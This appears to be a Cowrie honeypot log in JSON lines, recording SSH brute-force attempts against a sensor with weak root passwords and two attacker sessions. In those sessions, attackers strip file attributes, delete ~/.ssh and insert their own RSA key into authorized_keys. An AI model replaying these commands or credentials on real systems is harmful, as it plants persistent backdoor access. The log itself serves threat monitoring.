{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:58.609604Z","src_ip":"211.22.25.164","session":"1d0f2a1783d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:58.849142Z","src_ip":"211.22.25.164","session":"1d0f2a1783d3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:02:59.852257Z","src_ip":"211.22.25.164","session":"1d0f2a1783d3"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":42772,"dst_ip":"1.2.3.4","dst_port":22,"session":"a33511a1d3e5","protocol":"ssh","message":"New connection: 103.59.95.12:42772 (1.2.3.4:22) [session: a33511a1d3e5]","sensor":"my-vps","timestamp":"2025-09-09T04:02:59.886464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:59.887377Z","src_ip":"103.59.95.12","session":"a33511a1d3e5"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:00.095444Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:00.096561Z","src_ip":"211.22.25.164","session":"1d0f2a1783d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:00.153220Z","src_ip":"103.59.95.12","session":"a33511a1d3e5"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"1","message":"login attempt [nexus/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:03:01.673690Z","src_ip":"103.59.95.12","session":"a33511a1d3e5"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:02.939352Z","src_ip":"103.59.95.12","session":"a33511a1d3e5"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":43992,"dst_ip":"1.2.3.4","dst_port":22,"session":"d47e60a18f0e","protocol":"ssh","message":"New connection: 192.210.135.20:43992 (1.2.3.4:22) [session: d47e60a18f0e]","sensor":"my-vps","timestamp":"2025-09-09T04:03:04.035223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:03:04.036262Z","src_ip":"192.210.135.20","session":"d47e60a18f0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:04.146442Z","src_ip":"192.210.135.20","session":"d47e60a18f0e"}
{"eventid":"cowrie.login.failed","username":"david","password":"123","message":"login attempt [david/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:03:04.623784Z","src_ip":"192.210.135.20","session":"d47e60a18f0e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:05.735684Z","src_ip":"192.210.135.20","session":"d47e60a18f0e"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":52122,"dst_ip":"1.2.3.4","dst_port":22,"session":"33fdeffca4e7","protocol":"ssh","message":"New connection: 152.32.190.168:52122 (1.2.3.4:22) [session: 33fdeffca4e7]","sensor":"my-vps","timestamp":"2025-09-09T04:03:09.196424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:03:09.197494Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:09.458711Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.login.success","username":"root","password":"qq@123456","message":"login attempt [root/qq@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:03:10.541838Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:03:11.116605Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:03:11.117272Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:03:11.118299Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:11.380390Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:03:11.918831Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:03:11.919548Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:03:12.182119Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:12.183089Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":43126,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0043e99abf7","protocol":"ssh","message":"New connection: 152.32.190.168:43126 (1.2.3.4:22) [session: c0043e99abf7]","sensor":"my-vps","timestamp":"2025-09-09T04:03:12.321077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:03:12.321993Z","src_ip":"152.32.190.168","session":"c0043e99abf7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:12.520087Z","src_ip":"152.32.190.168","session":"c0043e99abf7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:03:13.356540Z","src_ip":"152.32.190.168","session":"c0043e99abf7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:14.558141Z","src_ip":"152.32.190.168","session":"c0043e99abf7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":43128,"dst_ip":"1.2.3.4","dst_port":22,"session":"ade8d55e4106","protocol":"ssh","message":"New connection: 152.32.190.168:43128 (1.2.3.4:22) [session: ade8d55e4106]","sensor":"my-vps","timestamp":"2025-09-09T04:03:14.761907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:03:14.762774Z","src_ip":"152.32.190.168","session":"ade8d55e4106"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:14.964347Z","src_ip":"152.32.190.168","session":"ade8d55e4106"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:03:15.812115Z","src_ip":"152.32.190.168","session":"ade8d55e4106"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:16.015335Z","src_ip":"152.32.190.168","session":"ade8d55e4106"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:16.071153Z","src_ip":"152.32.190.168","session":"33fdeffca4e7"}
{"eventid":"cowrie.session.connect","src_ip":"175.199.177.182","src_port":37703,"dst_ip":"1.2.3.4","dst_port":23,"session":"6759163d2fe9","protocol":"telnet","message":"New connection: 175.199.177.182:37703 (1.2.3.4:23) [session: 6759163d2fe9]","sensor":"my-vps","timestamp":"2025-09-09T04:03:23.641098Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":43857,"dst_ip":"1.2.3.4","dst_port":22,"session":"83830a5b7d8d","protocol":"ssh","message":"New connection: 154.209.4.55:43857 (1.2.3.4:22) [session: 83830a5b7d8d]","sensor":"my-vps","timestamp":"2025-09-09T04:03:44.049386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:03:44.060195Z","src_ip":"154.209.4.55","session":"83830a5b7d8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:03:44.253404Z","src_ip":"154.209.4.55","session":"83830a5b7d8d"}
{"eventid":"cowrie.login.failed","username":"config","password":"1234","message":"login attempt [config/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:03:45.042721Z","src_ip":"154.209.4.55","session":"83830a5b7d8d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:46.241171Z","src_ip":"154.209.4.55","session":"83830a5b7d8d"}
{"eventid":"cowrie.session.closed","duration":31.669434547424316,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:03:55.310464Z","src_ip":"175.199.177.182","session":"6759163d2fe9"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":39524,"dst_ip":"1.2.3.4","dst_port":22,"session":"039d444b14f9","protocol":"ssh","message":"New connection: 51.81.118.153:39524 (1.2.3.4:22) [session: 039d444b14f9]","sensor":"my-vps","timestamp":"2025-09-09T04:04:01.303026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:01.303699Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:01.397488Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.login.success","username":"root","password":"qhy123456","message":"login attempt [root/qhy123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:01.820229Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:02.058389Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.059094Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.060069Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.156042Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:02.401635Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
